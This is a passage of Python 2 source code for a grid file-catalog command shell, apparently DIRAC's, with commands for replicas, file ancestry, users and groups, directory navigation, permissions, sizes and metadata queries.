print "File successfully added to the catalog"
except Exception, x:
print "add file failed: ", str(x)
def registerReplica(self,args):
""" Add a file to the catatlog
usage: addpfn <lfn> <pfn> <SE>
"""
path = args[0]
infoDict = {}
lfn = self.getPath(path)
infoDict['PFN'] = args[1]
if infoDict['PFN'] == "''" or infoDict['PFN'] == '""':
infoDict['PFN'] = ''
infoDict['SE'] = args[2]
repDict = {}
repDict[lfn] = infoDict
try:
result = self.fc.addReplica(repDict)
if not result['OK']:
print "Failed to add replica to the catalog: ",
print result['Message']
elif result['Value']['Failed']:
print 'Failed to add replica:',result['Value']['Failed'][lfn]
else:
print "Replica added successfully:", result['Value']['Successful'][lfn]
except Exception, x:
print "add pfn failed: ", str(x)
def do_ancestorset(self,args):
""" Set ancestors for the given file
usage: ancestorset <lfn> <ancestor_lfn> [<ancestor_lfn>...]
"""
argss = args.split()
if (len(argss) == 0):
print self.do_ancestorset.__doc__
return
lfn = argss[0]
if lfn[0] != '/':
lfn = self.cwd + '/' + lfn
ancestors = argss[1:]
tmpList = []
for a in ancestors:
if a[0] != '/':
a = self.cwd + '/' + a
tmpList.append(a)
ancestors = tmpList
try:
result = self.fc.addFileAncestors({lfn:{'Ancestors':ancestors}})
if not result['OK']:
print "Failed to add file ancestors to the catalog: ",
print result['Message']
elif result['Value']['Failed']:
print "Failed to add file ancestors to the catalog: ",
print result['Value']['Failed'][lfn]
else:
print "Added %d ancestors to file %s" % (len(ancestors),lfn)
except Exception, x:
print "Exception while adding ancestors: ", str(x)
def complete_ancestorset(self, text, line, begidx, endidx):
args = line.split()
if ( len(args) == 1 ):
cur_path = ""
elif ( len(args) > 1 ):
# If the line ends with ' '
# this means a new parameter begin.
if line.endswith(' '):
cur_path = ""
else:
cur_path = args[-1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_ancestor(self,args):
""" Get ancestors of the given file
usage: ancestor <lfn> [depth]
"""
argss = args.split()
if (len(argss) == 0):
print self.do_ancestor.__doc__
return
lfn = argss[0]
if lfn[0] != '/':
lfn = self.cwd + '/' + lfn
depth = [1]
if len(argss) > 1:
depth = int(argss[1])
depth = range(1,depth+1)
try:
result = self.fc.getFileAncestors([lfn],depth)
if not result['OK']:
print "ERROR: Failed to get ancestors: ",
print result['Message']
elif result['Value']['Failed']:
print "Failed to get ancestors: ",
print result['Value']['Failed'][lfn]
else:
depthDict = {}
depSet = set()
for lfn,ancestorDict in result['Value']['Successful'].items():
for ancestor,dep in ancestorDict.items():
depthDict.setdefault(dep,[])
depthDict[dep].append(ancestor)
depSet.add(dep)
depList = list(depSet)
depList.sort()
print lfn
for dep in depList:
for lfn in depthDict[dep]:
print dep,' '*dep*5, lfn
except Exception, x:
print "Exception while getting ancestors: ", str(x)
def complete_ancestor(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_descendent(self,args):
""" Get descendents of the given file
usage: descendent <lfn> [depth]
"""
argss = args.split()
if (len(argss) == 0):
print self.do_descendent.__doc__
return
lfn = argss[0]
if lfn[0] != '/':
lfn = self.cwd + '/' + lfn
depth = [1]
if len(argss) > 1:
depth = int(argss[1])
depth = range(1,depth+1)
try:
result = self.fc.getFileDescendents([lfn],depth)
if not result['OK']:
print "ERROR: Failed to get descendents: ",
print result['Message']
elif result['Value']['Failed']:
print "Failed to get descendents: ",
print result['Value']['Failed'][lfn]
else:
depthDict = {}
depSet = set()
for lfn,descDict in result['Value']['Successful'].items():
for desc,dep in descDict.items():
depthDict.setdefault(dep,[])
depthDict[dep].append(desc)
depSet.add(dep)
depList = list(depSet)
depList.sort()
print lfn
for dep in depList:
for lfn in depthDict[dep]:
print dep,' '*dep*5, lfn
except Exception, x:
print "Exception while getting descendents: ", str(x)
def complete_descendent(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
#######################################################################################
# User and group methods
def do_user(self,args):
""" User related commands
usage:
user add <username> - register new user in the catalog
user delete <username> - delete user from the catalog
user show - show all users registered in the catalog
"""
argss = args.split()
if (len(argss)==0):
print self.do_user.__doc__
return
option = argss[0]
del argss[0]
if option == 'add':
if (len(argss)!=1):
print self.do_user.__doc__
return
return self.registerUser(argss)
elif option == 'delete':
if (len(argss)!=1):
print self.do_user.__doc__
return
return self.deleteUser(argss)
elif option == "show":
result = self.fc.getUsers()
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
if not result['Value']:
print "No entries found"
else:
for user,id_ in result['Value'].items():
print user.rjust(20),':',id_
else:
print "Unknown option:",option
# completion for ``user``
_available_user_cmd = ['add', 'delete', 'show']
def complete_user(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) == 2 and (args[1] in self._available_user_cmd):
# if the sub command exists,
# Don't need any auto completion
return result
result = [i for i in self._available_user_cmd if i.startswith(text)]
return result
def do_group(self,args):
""" Group related commands
usage:
group add <groupname> - register new group in the catalog
group delete <groupname> - delete group from the catalog
group show - show all groups registered in the catalog
"""
argss = args.split()
if (len(argss)==0):
print self.do_group.__doc__
return
option = argss[0]
del argss[0]
if option == 'add':
if (len(argss)!=1):
print self.do_group.__doc__
return
return self.registerGroup(argss)
elif option == 'delete':
if (len(argss)!=1):
print self.do_group.__doc__
return
return self.deleteGroup(argss)
elif option == "show":
result = self.fc.getGroups()
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
if not result['Value']:
print "No entries found"
else:
for user,id_ in result['Value'].items():
print user.rjust(20),':',id_
else:
print "Unknown option:",option
# completion for ``group``
_available_group_cmd = ['add', 'delete', 'show']
def complete_group(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) == 2 and (args[1] in self._available_group_cmd):
# if the sub command exists,
# Don't need any auto completion
return result
result = [i for i in self._available_group_cmd if i.startswith(text)]
return result
def registerUser(self,argss):
""" Add new user to the File Catalog
usage: user add <user_name>
"""
username = argss[0]
result = self.fc.addUser(username)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "User ID:",result['Value']
def deleteUser(self,args):
""" Delete user from the File Catalog
usage: user delete <user_name>
"""
username = args[0]
result = self.fc.deleteUser(username)
if not result['OK']:
print ("Error: %s" % result['Message'])
def registerGroup(self,argss):
""" Add new group to the File Catalog
usage: group add <group_name>
"""
gname = argss[0]
result = self.fc.addGroup(gname)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "Group ID:",result['Value']
def deleteGroup(self,args):
""" Delete group from the File Catalog
usage: group delete <group_name>
"""
gname = args[0]
result = self.fc.deleteGroup(gname)
if not result['OK']:
print ("Error: %s" % result['Message'])
def do_mkdir(self,args):
""" Make directory
usage: mkdir <path>
"""
argss = args.split()
if (len(argss)==0):
print self.do_mkdir.__doc__
return
path = argss[0]
if path.find('/') == 0:
newdir = path
else:
newdir = self.cwd + '/' + path
newdir = newdir.replace(r'//','/')
result = self.fc.createDirectory(newdir)
if result['OK']:
if result['Value']['Successful']:
if result['Value']['Successful'].has_key(newdir):
print "Successfully created directory:", newdir
elif result['Value']['Failed']:
if result['Value']['Failed'].has_key(newdir):
print 'Failed to create directory:',result['Value']['Failed'][newdir]
else:
print 'Failed to create directory:',result['Message']
def complete_mkdir(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_cd(self,args):
""" Change directory to <path>
usage: cd <path>
cd -
"""
argss = args.split()
if len(argss) == 0:
path = '/'
else:
path = argss[0]
if path == '-':
path = self.previous_cwd
newcwd = self.getPath(path)
if len(newcwd)>1 and not newcwd.find('..') == 0 :
newcwd=newcwd.rstrip("/")
result = self.fc.isDirectory(newcwd)
if result['OK']:
if result['Value']['Successful']:
if result['Value']['Successful'][newcwd]:
#if result['Type'] == "Directory":
self.previous_cwd = self.cwd
self.cwd = newcwd
self.prompt = 'FC:'+self.cwd+'> '
else:
print newcwd,'does not exist or is not a directory'
else:
print newcwd,'is not found'
else:
print 'Server failed to find the directory',newcwd
def complete_cd(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_id(self,args):
""" Get user identity
"""
result = getProxyInfo()
if not result['OK']:
print "Error: %s" % result['Message']
return
user = result['Value']['username']
group = result['Value']['group']
result = self.fc.getUsers()
if not result['OK']:
print "Error: %s" % result['Message']
return
userDict = result['Value']
result = self.fc.getGroups()
if not result['OK']:
print "Error: %s" % result['Message']
return
groupDict = result['Value']
idUser = userDict.get(user,0)
idGroup = groupDict.get(group,0)
print "user=%d(%s) group=%d(%s)" % (idUser,user,idGroup,group)
def do_lcd(self,args):
""" Change local directory
usage:
lcd <local_directory>
"""
argss = args.split()
if (len(argss) != 1):
print self.do_lcd.__doc__
return
localDir = argss[0]
try:
os.chdir(localDir)
newDir = os.getcwd()
print "Local directory: %s" % newDir
except OSError:
print "Error: %s doesn't seem to be a local directory" % localDir
def complete_lcd(self, text, line, begidx, endidx):
# TODO
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.ul_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_pwd(self,args):
""" Print out the current directory
usage: pwd
"""
print self.cwd
def do_ls(self,args):
""" Lists directory entries at <path>
usage: ls [-ltrn] <path>
"""
argss = args.split()
# Get switches
_long = False
reverse = False
timeorder = False
numericid = False
path = self.cwd
if len(argss) > 0:
if argss[0][0] == '-':
if 'l' in argss[0]:
_long = True
if 'r' in argss[0]:
reverse = True
if 't' in argss[0]:
timeorder = True
if 'n' in argss[0]:
numericid = True
del argss[0]
# Get path
if argss:
path = argss[0]
if path[0] != '/':
path = self.cwd+'/'+path
path = path.replace(r'//','/')
# remove last character if it is "/"
if path[-1] == '/' and path != '/':
path = path[:-1]
# Check if the target path is a file
result = self.fc.isFile(path)
if not result['OK']:
print "Error: can not verify path"
return
elif path in result['Value']['Successful'] and result['Value']['Successful'][path]:
result = self.fc.getFileMetadata(path)
dList = DirectoryListing()
fileDict = result['Value']['Successful'][path]
dList.addFile(os.path.basename(path),fileDict,{},numericid)
dList.printListing(reverse,timeorder)
return
# Get directory contents now
try:
result = self.fc.listDirectory(path,_long)
dList = DirectoryListing()
if result['OK']:
if result['Value']['Successful']:
for entry in result['Value']['Successful'][path]['Files']:
fname = entry.split('/')[-1]
# print entry, fname
# fname = entry.replace(self.cwd,'').replace('/','')
if _long:
fileDict = result['Value']['Successful'][path]['Files'][entry]['MetaData']
repDict = result['Value']['Successful'][path]['Files'][entry].get( "Replicas", {} )
if fileDict:
dList.addFile(fname,fileDict,repDict,numericid)
else:
dList.addSimpleFile(fname)
for entry in result['Value']['Successful'][path]['SubDirs']:
dname = entry.split('/')[-1]
# print entry, dname
# dname = entry.replace(self.cwd,'').replace('/','')
if _long:
dirDict = result['Value']['Successful'][path]['SubDirs'][entry]
if dirDict:
dList.addDirectory(dname,dirDict,numericid)
else:
dList.addSimpleFile(dname)
for entry in result['Value']['Successful'][path]['Links']:
pass
if 'Datasets' in result['Value']['Successful'][path]:
for entry in result['Value']['Successful'][path]['Datasets']:
dname = os.path.basename( entry )
if _long:
dsDict = result['Value']['Successful'][path]['Datasets'][entry]['Metadata']
if dsDict:
dList.addDataset(dname,dsDict,numericid)
else:
dList.addSimpleFile(dname)
if _long:
dList.printListing(reverse,timeorder)
else:
dList.printOrdered()
else:
print "Error:",result['Message']
except Exception, x:
print "Error:", str(x)
def complete_ls(self, text, line, begidx, endidx):
result = []
args = line.split()
index_cnt = 0
if (len(args) > 1):
if ( args[1][0] == "-"):
index_cnt = 1
# the first argument -- LFN.
if (1+index_cnt<=len(args)<=2+index_cnt):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_cnt) or (len(args)==2+index_cnt and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_cnt):
cur_path = args[1+index_cnt]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_chown(self,args):
""" Change owner of the given path
usage: chown [-R] <owner> <path>
"""
argss = args.split()
recursive = False
if (len(argss) == 0):
print self.do_chown.__doc__
return
if argss[0] == '-R':
recursive = True
del argss[0]
if (len(argss) != 2):
print self.do_chown.__doc__
return
owner = argss[0]
path = argss[1]
lfn = self.getPath(path)
pathDict = {}
pathDict[lfn] = owner
try:
result = self.fc.changePathOwner( pathDict, recursive )
if not result['OK']:
print "Error:",result['Message']
return
if lfn in result['Value']['Failed']:
print "Error:",result['Value']['Failed'][lfn]
return
except Exception, x:
print "Exception:", str(x)
def complete_chown(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0+1
if '-R' in args:
index_counter = 1+1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_chgrp(self,args):
""" Change group of the given path
usage: chgrp [-R] <group> <path>
"""
argss = args.split()
recursive = False
if (len(argss) == 0):
print self.do_chgrp.__doc__
return
if argss[0] == '-R':
recursive = True
del argss[0]
if (len(argss) != 2):
print self.do_chgrp.__doc__
return
group = argss[0]
path = argss[1]
lfn = self.getPath(path)
pathDict = {}
pathDict[lfn] = group
try:
result = self.fc.changePathGroup( pathDict, recursive )
if not result['OK']:
print "Error:",result['Message']
return
if lfn in result['Value']['Failed']:
print "Error:",result['Value']['Failed'][lfn]
return
except Exception, x:
print "Exception:", str(x)
def complete_chgrp(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0+1
if '-R' in args:
index_counter = 1+1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_chmod(self,args):
""" Change permissions of the given path
usage: chmod [-R] <mode> <path>
"""
argss = args.split()
recursive = False
if (len(argss) < 2):
print self.do_chmod.__doc__
return
if argss[0] == '-R':
recursive = True
del argss[0]
mode = argss[0]
path = argss[1]
lfn = self.getPath(path)
pathDict = {}
# treat mode as octal
pathDict[lfn] = int(mode,8)
try:
result = self.fc.changePathMode( pathDict, recursive )
if not result['OK']:
print "Error:",result['Message']
return
if lfn in result['Value']['Failed']:
print "Error:",result['Value']['Failed'][lfn]
return
except Exception, x:
print "Exception:", str(x)
def complete_chmod(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0+1
if '-R' in args:
index_counter = 1+1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_size(self,args):
""" Get file or directory size. If -l switch is specified, get also the total
size per Storage Element
usage: size [-l] [-f] <lfn>|<dir_path>
Switches:
-l long output including per SE report
-f use raw file information and not the storage tables
"""
argss = args.split()
_long = False
fromFiles = False
if len(argss) > 0:
if argss[0] == '-l':
_long = True
del argss[0]
if len(argss) > 0:
if argss[0] == '-f':
fromFiles = True
del argss[0]
if len(argss) == 1:
path = argss[0]
if path == '.':
path = self.cwd
else:
path = self.cwd
path = self.getPath(path)
try:
result = self.fc.isFile(path)
if not result['OK']:
print "Error:",result['Message']
if result['Value']['Successful']:
if result['Value']['Successful'][path]:
print "lfn:",path
result = self.fc.getFileSize(path)
if result['OK']:
if result['Value']['Successful']:
print "Size:",result['Value']['Successful'][path]
else:
print "File size failed:", result['Value']['Failed'][path]
else:
print "File size failed:",result['Message']
else:
print "directory:",path
result = self.fc.getDirectorySize( path, _long, fromFiles )
if result['OK']:
if result['Value']['Successful']:
print "Logical Size:",int_with_commas(result['Value']['Successful'][path]['LogicalSize']), \
"Files:",result['Value']['Successful'][path]['LogicalFiles'], \
"Directories:",result['Value']['Successful'][path]['LogicalDirectories']
if _long:
fields = ['StorageElement','Size','Replicas']
values = []
if "PhysicalSize" in result['Value']['Successful'][path]:
print
totalSize = result['Value']['Successful'][path]['PhysicalSize']['TotalSize']
totalFiles = result['Value']['Successful'][path]['PhysicalSize']['TotalFiles']
for se,sdata in result['Value']['Successful'][path]['PhysicalSize'].items():
if not se.startswith("Total"):
size = sdata['Size']
nfiles = sdata['Files']
#print se.rjust(20),':',int_with_commas(size).ljust(25),"Files:",nfiles
values.append( (se, int_with_commas(size), str(nfiles)) )
#print '='*60
#print 'Total'.rjust(20),':',int_with_commas(totalSize).ljust(25),"Files:",totalFiles
values.append( ('Total', int_with_commas(totalSize), str(totalFiles)) )
printTable(fields,values)
if "QueryTime" in result['Value']:
print "Query time %.2f sec" % result['Value']['QueryTime']
else:
print "Directory size failed:", result['Value']['Failed'][path]
else:
print "Directory size failed:",result['Message']
else:
print "Failed to determine path type"
except Exception, x:
print "Size failed: ", x
def complete_size(self, text, line, begidx, endidx):
result = []
args = line.split()
index_counter = 0
if '-l' in args:
index_counter = 1
# the first argument -- LFN.
if ((1+index_counter) <=len(args)<= (2+index_counter)):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1+index_counter) or (len(args)==2+index_counter and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2+index_counter):
cur_path = args[1+index_counter]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_guid(self,args):
""" Get the file GUID
usage: guid <lfn>
"""
argss = args.split()
if (len(argss) == 0):
print self.do_guid.__doc__
return
path = argss[0]
try:
result = self.fc.getFileMetadata(path)
if result['OK']:
if result['Value']['Successful']:
print "GUID:",result['Value']['Successful'][path]['GUID']
else:
print "ERROR: getting guid failed"
else:
print "ERROR:",result['Message']
except Exception, x:
print "guid failed: ", x
def complete_guid(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
##################################################################################
# Metadata methods
def do_meta(self,args):
""" Metadata related operations
Usage:
meta index [-d|-f|-r] <metaname> [<metatype>] - add new metadata index. Possible types are:
'int', 'float', 'string', 'date';
-d directory metadata
-f file metadata
-r remove the specified metadata index
meta set <path> <metaname> <metavalue> - set metadata value for directory or file
meta remove <path> <metaname> - remove metadata value for directory or file
meta get [-e] [<path>] - get metadata for the given directory or file
meta tags <path> <metaname> where <meta_selection> - get values (tags) of the given metaname compatible with
the metadata selection
meta show - show all defined metadata indices
"""
argss = args.split()
if (len(argss)==0):
print self.do_meta.__doc__
return
option = argss[0]
del argss[0]
if option == 'set':
if (len(argss) != 3):
print self.do_meta.__doc__
return
return self.setMeta(argss)
elif option == 'get':
return self.getMeta(argss)
elif option[:3] == 'tag':
# TODO
if (len(argss) == 0):
print self.do_meta.__doc__
return
return self.metaTag(argss)
elif option == 'index':
if (len(argss) < 1):
print self.do_meta.__doc__
return
return self.registerMeta(argss)
elif option == 'metaset':
# TODO
if (len(argss) == 0):
print self.do_meta.__doc__
return
return self.registerMetaset(argss)
elif option == 'show':
return self.showMeta()
elif option == 'remove' or option == "rm":
if (len(argss) != 2):
print self.do_meta.__doc__
return
return self.removeMeta(argss)
else:
print "Unknown option:",option
# auto completion for ``meta``
# TODO: what's the doc for metaset?
_available_meta_cmd = ["set", "get", "tag", "tags",
"index", "metaset","show",
"rm", "remove"]
_meta_cmd_need_lfn = ["set", "get",
"rm", "remove"]
def complete_meta(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) >= 2 and (args[1] in self._available_meta_cmd):
# if the sub command is not in self._meta_cmd_need_lfn
# Don't need any auto completion
if (args[1] in self._meta_cmd_need_lfn):
# TODO
if (len(args) == 2):
cur_path = ""
elif ( len(args) > 2 ):
# If the line ends with ' '
# this means a new parameter begin.
if line.endswith(' '):
cur_path = ""
else:
cur_path = args[-1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
pass
return result
result = [i for i in self._available_meta_cmd if i.startswith(text)]
return result
def removeMeta(self,argss):
""" Remove the specified metadata for a directory or file
"""
apath = argss[0]
path = self.getPath(apath)
if len(argss) < 2:
print "Error: no metadata is specified for removal"
return
metadata = argss[1:]
result = self.fc.removeMetadata(path,metadata)
if not result['OK']:
print "Error:", result['Message']
if "FailedMetadata" in result:
for meta,error in result['FailedMetadata']:
print meta,';',error
def setMeta(self,argss):
""" Set metadata value for a directory
"""
if len(argss) != 3:
print "Error: command requires 3 arguments, %d given" % len(argss)
return
path = argss[0]
if path == '.':
path = self.cwd
elif path[0] != '/':
path = self.cwd+'/'+path
meta = argss[1]
value = argss[2]
print path,meta,value
metadict = {}
metadict[meta]=value
result = self.fc.setMetadata(path,metadict)
if not result['OK']:
print ("Error: %s" % result['Message'])
def getMeta(self,argss):
""" Get metadata for the given directory
"""
expandFlag = False
dirFlag = True
if len(argss) == 0:
path ='.'
else:
if argss[0] == "-e":
expandFlag = True
del argss[0]
if len(argss) == 0:
path ='.'
else:
path = argss[0]
dirFlag = False
if path == '.':
path = self.cwd
elif path[0] != '/':
path = self.getPath(path)
path = path.rstrip( '/' )
if not dirFlag:
# Have to decide if it is a file or not
result = self.fc.isFile(path)
if not result['OK']:
print "ERROR: Failed to contact the catalog"
return
if not result['Value']['Successful']:
print "ERROR: Path not found"
return
dirFlag = not result['Value']['Successful'][path]
if dirFlag:
result = self.fc.getDirectoryMetadata(path)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if result['Value']:
metaDict = result['MetadataOwner']
metaTypeDict = result['MetadataType']
for meta, value in result['Value'].items():
setFlag = metaDict[meta] != 'OwnParameter' and metaTypeDict[meta] == "MetaSet"
prefix = ''
if setFlag:
prefix = "+"
if metaDict[meta] == 'ParentMetadata':
prefix += "*"
print (prefix+meta).rjust(20),':',value
elif metaDict[meta] == 'OwnMetadata':
prefix += "!"
print (prefix+meta).rjust(20),':',value
else:
print meta.rjust(20),':',value
if setFlag and expandFlag:
result = self.fc.getMetadataSet(value,expandFlag)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
for m,v in result['Value'].items():
print " "*10,m.rjust(20),':',v
else:
print "No metadata defined for directory"
else:
result = self.fc.getFileUserMetadata(path)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if result['Value']:
for meta,value in result['Value'].items():
print meta.rjust(20),':', value
else:
print "No metadata found"
def metaTag(self,argss):
""" Get values of a given metadata tag compatible with the given selection
"""
path = argss[0]
del argss[0]
tag = argss[0]
del argss[0]
path = self.getPath(path)
# Evaluate the selection dictionary
metaDict = {}
if argss:
if argss[0].lower() == 'where':
result = self.fc.getMetadataFields()
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if not result['Value']:
print "Error: no metadata fields defined"
return
typeDictfm = result['Value']['FileMetaFields']
typeDict = result['Value']['DirectoryMetaFields']
del argss[0]
for arg in argss:
try:
name,value = arg.split('=')
if not name in typeDict:
if not name in typeDictfm:
print "Error: metadata field %s not defined" % name
else:
print 'No support for metadata at the File level yet: %s' % name
return
mtype = typeDict[name]
mvalue = value
if mtype[0:3].lower() == 'int':
mvalue = int(value)
if mtype[0:5].lower() == 'float':
mvalue = float(value)
metaDict[name] = mvalue
except Exception,x:
print "Error:",str(x)
return
else:
print "Error: WHERE keyword is not found after the metadata tag name"
return
result = self.fc.getCompatibleMetadata( metaDict, path )
if not result['OK']:
print ("Error: %s" % result['Message'])
return
tagDict = result['Value']
if tag in tagDict:
if tagDict[tag]:
print "Possible values for %s:" % tag
for v in tagDict[tag]:
print v
else:
print "No compatible values found for %s" % tag
def showMeta(self):
""" Show defined metadata indices
"""
result = self.fc.getMetadataFields()
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
if not result['Value']:
print "Metadata for file or directory found"
else:
if len(result['Value']['FileMetaFields']):
print "\n","File metadata".rjust(20,":")
for meta, metatype in result['Value']['FileMetaFields'].items():
metatype = metatype.replace("int","integer").replace("INT","integer").replace("VARCHAR(128)","string")
print meta.rjust(20),':',metatype
if len(result['Value']['DirectoryMetaFields']):
print "\n","Directory metadata".rjust(20),":"
for meta,metatype in result['Value']['DirectoryMetaFields'].items():
metatype = metatype.replace("int","integer").replace("INT","integer").replace("VARCHAR(128)","string")
print meta.rjust(20),':',metatype
result = self.fc.listMetadataSets()
if not result['OK']:
print 'Error: %s' % result['Message']
else:
if not result['Value']:
print "No Metadata sets defined"
else:
print "\n","Metadata sets".rjust(20),":"
for metasetname, values in result['Value'].items():
metastr = ''
for key,val in values.items():
metastr += "%s : %s, " % (key, val)
metastr = metastr.rstrip(", ")
print "%s -> %s" % (metasetname.rjust(20), metastr)
def registerMeta(self,argss):
""" Add metadata field.
"""
if len(argss) < 2:
print "Unsufficient number of arguments"
return
fdType = '-d'
removeFlag = False
if argss[0].lower() in ['-d','-f']:
fdType = argss[0]
del argss[0]
if argss[0].lower() == '-r':
removeFlag = True
del argss[0]
if len(argss) < 2 and not removeFlag:
print "Unsufficient number of arguments"
return
mname = argss[0]
if removeFlag:
result = self.fc.deleteMetadataField(mname)
if not result['OK']:
print "Error:", result['Message']
return
mtype = argss[1]
if mtype.lower()[:3] == 'int':
rtype = 'INT'
elif mtype.lower()[:7] == 'varchar':
rtype = mtype
elif mtype.lower() == 'string':
rtype = 'VARCHAR(128)'
elif mtype.lower() == 'float':
rtype = 'FLOAT'
elif mtype.lower() == 'date':
rtype = 'DATETIME'
elif mtype.lower() == 'metaset':
rtype = 'MetaSet'
else:
print "Error: illegal metadata type %s" % mtype
return
result = self.fc.addMetadataField(mname,rtype,fdType)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "Added metadata field %s of type %s" % (mname,mtype)
def registerMetaset(self,argss):
""" Add metadata set
"""
setDict = {}
setName = argss[0]
del argss[0]
for arg in argss:
key,value = arg.split('=')
setDict[key] = value
result = self.fc.addMetadataSet(setName,setDict)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "Added metadata set %s" % setName
def do_find(self,args):
""" Find all files satisfying the given metadata information
usage: find [-q] [-D] <path> <meta_name>=<meta_value> [<meta_name>=<meta_value>]
"""
argss = args.split()
if (len(argss) < 1):
print self.do_find.__doc__
return
verbose = True
if argss[0] == "-q":
verbose = False
del argss[0]
dirsOnly = False
if argss[0] == "-D":
dirsOnly = True
del argss[0]
path = argss[0]
path = self.getPath(path)
del argss[0]
if argss:
if argss[0][0] == '{':
metaDict = eval(argss[0])
else:
metaDict = self.__createQuery(' '.join(argss))
else:
metaDict = {}
if verbose:
print "Query:",metaDict
result = self.fc.findFilesByMetadata(metaDict,path)
if not result['OK']:
print ("Error: %s" % result['Message'])
return
if result['Value']:
listToPrint = None
if dirsOnly:
listToPrint = set( "/".join(fullpath.split("/")[:-1]) for fullpath in result['Value'] )
else:
listToPrint = result['Value']
for dir_ in listToPrint:
print dir_
else:
if verbose:
print "No matching data found"
if verbose and "QueryTime" in result:
print "QueryTime %.2f sec" % result['QueryTime']
def complete_find(self, text, line, begidx, endidx):
result = []
args = line.split()
# skip "-q" optional switch
if len(args) >= 2 and args[1] == "-q":
if len(args) > 2 or line.endswith(" "):
del args[1]
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def __createQuery(self,args):
""" Create the metadata query out of the command line arguments
"""
argss = args.split()
result = self.fc.getMetadataFields()
if not result['OK']:
print ("Error: %s" % result['Message'])
return None
if not result['Value']:
print "Error: no metadata fields defined"
return None
typeDict = result['Value']['FileMetaFields']
typeDict.update(result['Value']['DirectoryMetaFields'])
# Special meta tags
typeDict['SE'] = 'VARCHAR'
typeDict['User'] = 'VARCHAR'
typeDict['Group'] = 'VARCHAR'
typeDict['Path'] = 'VARCHAR'
metaDict = {}
contMode = False
for arg in argss:
if not contMode:
operation = ''
for op in ['>=','<=','>','<','!=','=']:
if arg.find(op) != -1:
operation = op
break
if not operation:
print "Error: operation is not found in the query"
return None
name,value = arg.split(operation)
if not name in typeDict:
print "Error: metadata field %s not defined" % name
return None
mtype = typeDict[name]
else:
value += ' ' + arg
value = value.replace(contMode,'')
